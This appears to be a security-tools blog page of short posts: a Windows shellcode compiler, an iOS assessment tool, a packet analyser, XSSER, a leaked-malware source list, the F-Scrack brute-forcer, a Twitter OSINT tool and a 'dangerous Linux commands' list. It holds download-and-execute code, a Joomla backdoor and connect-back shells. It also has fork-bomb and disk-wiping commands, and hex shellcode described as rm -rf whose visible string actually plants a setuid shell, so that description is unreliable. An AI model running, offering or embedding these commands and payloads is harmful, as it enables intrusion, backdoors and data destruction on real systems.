Shellcode C/C++ Compiler for Windows - ShellcodeCompiler

Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM ( http://www.nasm.us/ ).

Shellcode compiler was released at DefCamp security conference in Romania, November 2016.

Command line options

    -h (--help)      : Show this help message
    -v (--verbose)   : Print detailed output
    -t (--test)      : Test (execute) generated shellcode
    -r (--read)      : Read source code file
    -o (--output)    : Output file of the generated binary shellcode
    -a (--assembbly) : Output file of the generated assembly code

Source code example

    function URLDownloadToFileA("urlmon.dll");
    function WinExec("kernel32.dll");
    function ExitProcess("kernel32.dll");

    URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
    WinExec("bk.exe",0);
    ExitProcess(0);

Invocation example

    ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations

1. It is not possible to use the return value of an API call
2. It is not possible to use pointers or buffers
3. It is not possible to declare variables

All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.

Download ShellcodeCompiler

Read More

iOS App Security Assessment Tool - idb

idb is a tool to simplify some common tasks for iOS app security assessments and research. Please see the Documentation for a more detailed summary of each function.

Features

• Assessment Setup
  • SSH port forwarding
  • Installation of helper utilities
• App Information
  • Bundle information
  • Registered URL Schemes
  • Platform and SDK Versions
  • Data folder location
  • Entitlements
• Data Storage
  • List plist files and data protection class
  • List sqlite files and data protection class
  • List Cache.db files and data protection class
  • Full app file system browser
    • Browse files
    • Download/view files
    • Check data protection
    • Rsync folders and keep git revisions
  • Dump iOS keychain
• Binary Analysis
  • Check for encryption
  • Check for protections (ASLR/PIE, DEP, ARC)
  • List shared libraries
  • Extract strings in app binary
  • Dump class and method signatures
• IPC
  • List URL handlers
  • Invoke and fuzz URL handlers
  • Monitor the iOS pasteboardA
• Other Tools
• Check for iOS backgrounding screenshot
• Install certificates
• Edit /etc/hosts file

Download idb

Read More

Caffeinated Packet Analyzer - Dripcap

Caffeinated packet analyzer. Dripcap is a modern packet analyzer based on Electron.

Getting Started

• Download & Install
• Capturing
• Packet Filtering
• Display Filter Syntax

Advanced Usage

• Build from source
• Import Pcap Files
• Install Add-on Packages

Create & Publish Your Package

• Create Theme Package
• Create Dissector Package
• Create UI Package
• Publish Package

Dissector Overview

• Dissection Process
• Namespace
• Create a Custom Dissector Class

API Reference

• UI Classes
• Builtin Dissector Classes

Download Dripcap

Read More

From XSS to RCE - XSSER

From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

• Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf
• Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj

Requirements

• Python (2.7.*, version 2.7.11 was used for development and demo)
• Gnome
• Bash
• Msfconsole (accessible via environment variables)
• Netcat (nc)
• cURL (curl) [NEW]
• PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility

• Chrome (14 Nov 2015) - This should still work.
• Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

• WordPress http://wordpress.org/
• Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip
• Optional: WPSEO https://yoast.com/wordpress/plugins/seo/

WordPress Exploit

• http://www.exploit-db.com/exploits/27290/

Joomla Lab

• Joomla https://www.joomla.org/
• SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip

Joomla Exploit

• https://www.exploit-db.com/exploits/39879/

Directories

• Audio: Contains remixed audio notifications.
• Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
• Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
• Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
• Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By

• Hans-Michael Varbaek
• Sense of Security

Credits

• MaXe / InterN0T

Download XSSER

Read More

Collections of Malware source code - Leaked

This is leaked source code of Malwares.

Obs, I am not responsible for your actions

Source from:

http://www.malwaretech.com/p/sources.html Dexter v2 (Point of Sales Trojan) Rovnix (Bootkit) Carberp (Banking Trojan) Tinba (Tiny ASM Banking Trojan) Zeus (Banking Trojan) KINS (Banking Trojan) Dendroid (Android Trojan) Grum (Spam Bot) Pony 2.0 (Stealer) Alina Spark (Point of Sales Trojan) RIG Front-end (Exploit Kit)

Download Malware Source Code (OFF)

Read More

A Single File Bruteforcer Supports Multi-Protocol - F-Scrack

F-Scrack is a single file bruteforcer supports multi-protocol, no extra library requires except python standard library, which is ideal for a quick test.

Currently support protocol: FTP, MySQL, MSSQL，MongoDB，Redis，Telnet，Elasticsearch，PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.

Usage
Options:

python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h
Supports ip(192.168.1.1), ip range (192.168.1) (192.168.1.1-192.168.1.254), ip list (ip.ini) , maximum 65535 ips per scan.
-p
Ports you want to scan, use comma to separate multi ports. Eg 1433,3306,5432. 
Default scan ports(21,23,1433,3306,5432,6379,9200,11211,27017) if no ports specified.
-m
Number of threads. Default is 100.
-t
Seconds to wait before timeout.
-d
Dictionary file.
-n
Scan without ping scan(Live hosts detect).

Example:

python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n

Download F-Scrack

Read More

Get detailed information about a Twitter user activity - Tinfoleak v2.0

Are you interested in OSINT tools? Tinfoleak is the best OSINT tool for Twitter, and is open-source!
The new version includes a lot of new and improved features:

• Search by coordinates
• Geolocated users
• Tagged users
• User conversations
• Identification in other social networks
• More powerful and flexible search filter
• More detailed information on existing features
• … and many more information to generate intelligence!

Screenshots

Download Tinfoleak V2.0

Read More

Making Wills by Noam Chomsky

Making Wills, by Noam Chomsky in Requiem for the American Dream.
Create and spread consumerism in an ingenious and effective way, transforming human beings into consumers with little or no critical sense to keep them hostage to the consumer society, always under control.

By OffSec

Read More

Dangerous Linux Commands

rm -rf Command

The rm -rf command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with rm command are.

1. rm command in Linux is used to delete files.
2. rm -r command deletes the folder recursively, even the empty folder.
3. rm -f command removes ‘Read only File’ without asking.
4. rm -rf / : Force deletion of everything in root directory.
5. rm -rf * : Force deletion of everything in current directory/working directory.
6. rm -rf . : Force deletion of current folder and sub folders.

Hence, be careful when you are executing rm -rf command. To overcome accidental delete of file by ‘rm‘ command, create an alias of ‘rm‘ command as ‘rm -i‘ in “.bashrc” file, it will ask you to confirm every deletion.

:(){:|:&};: Command

This command is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.

:(){:|:&};:

command > /dev/sda

The above example writes the output of ‘command‘ on the block /dev/sda. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.

mv folder /dev/null

The mv command will move ‘folder‘ to /dev/null. In Linux /dev/null or null device is a special file that discards all the data written to it and reports that write operation succeed.

# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means everything there was sent to blackhole (null).

wget http://malicious_source -O- | sh

This wget example will download a script from a malicious source and then execute it.

mkfs.ext3 /dev/sda

The example will format the ‘sda’. After execution of the above command your Hard Disk Drive would be marked as ‘NEW’, You would be left without any data and in unrecoverable system stage.

> file

This command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> xt.conf” it would ‘flush’ a configuration file or any other system file.

^foo^bar

This command is used to edit the previous run command without the need of retyping the whole command again. This can really be really dangerous.

dd if=/dev/random of=/dev/sda

This dd will wipe out the block device sda and write random junk. Your system would be left at inconsistent and unrecoverable stage.

Hidden Command

The command bellow is nothing more than a rm -rf. Here, the command is hidden in in hex and the user may be fooled into running it. Running this code will wipe your root partition. This command here shows that the threat may be hidden and not normally detectable sometimes.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Read More